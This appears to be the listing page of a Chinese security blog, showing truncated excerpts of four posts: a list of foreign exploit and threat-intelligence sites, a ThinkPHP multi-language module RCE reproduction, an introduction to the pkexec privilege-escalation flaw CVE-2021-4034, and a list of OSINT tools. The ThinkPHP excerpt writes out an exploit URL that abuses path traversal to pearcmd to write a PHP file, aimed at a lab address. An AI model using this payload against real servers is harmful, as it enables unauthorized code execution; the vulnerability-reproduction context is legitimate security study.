不收藏一定会后悔的11个国外网络安全资源

0dayTodayhttps://0day.today/号称世界上最大的漏洞利用数据库Packetstormhttps://packetstormsecurity.com/不用过多介绍,强大的漏洞库和情报Deepquest's BlogDeepquest的个人博客,包含新漏洞信息和情报https://deepquest.code511.com/blog/Cxsecurityhttps://cxse

- 阅读全文 -

【漏洞复现】ThinkPHP 多语言模块RCE

Exp# 写文件 http://172.17.0.2/public/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?=phpinfo()?>+/tmp/hello.php # 包含文件 http://172.17.0.2/public/index.p

- 阅读全文 -

Polkit pkexec本地特权提升漏洞(CVE-2021-4034)

简介Qualys 研究团队在 polkit (原名PolicyKit)的 pkexec 中发现了一个本地特权提升漏洞,该SUID-root程序默认安装在每个主要的Linux发行版上。该漏洞允许任何非特权用户通过在Linux默认配置中利用此漏洞来获得易受攻击主机的完全root权限。关于 Polkit pkexec for LinuxPolkit(原名PolicyKit)是一个用于在类 Unix 操作

- 阅读全文 -

常用OSINT工具

名称简介地址Github Starredawesome-osint令人惊叹的 OSINT 精选列表https://github.com/jivoi/awesome-osint16.2kMaltego一款非常优秀的自动化信息收集工具,目前有社区免费版,Kali自带https://www.maltego.com-trufflehog开源秘密扫描引擎https://github.com/truffles

- 阅读全文 -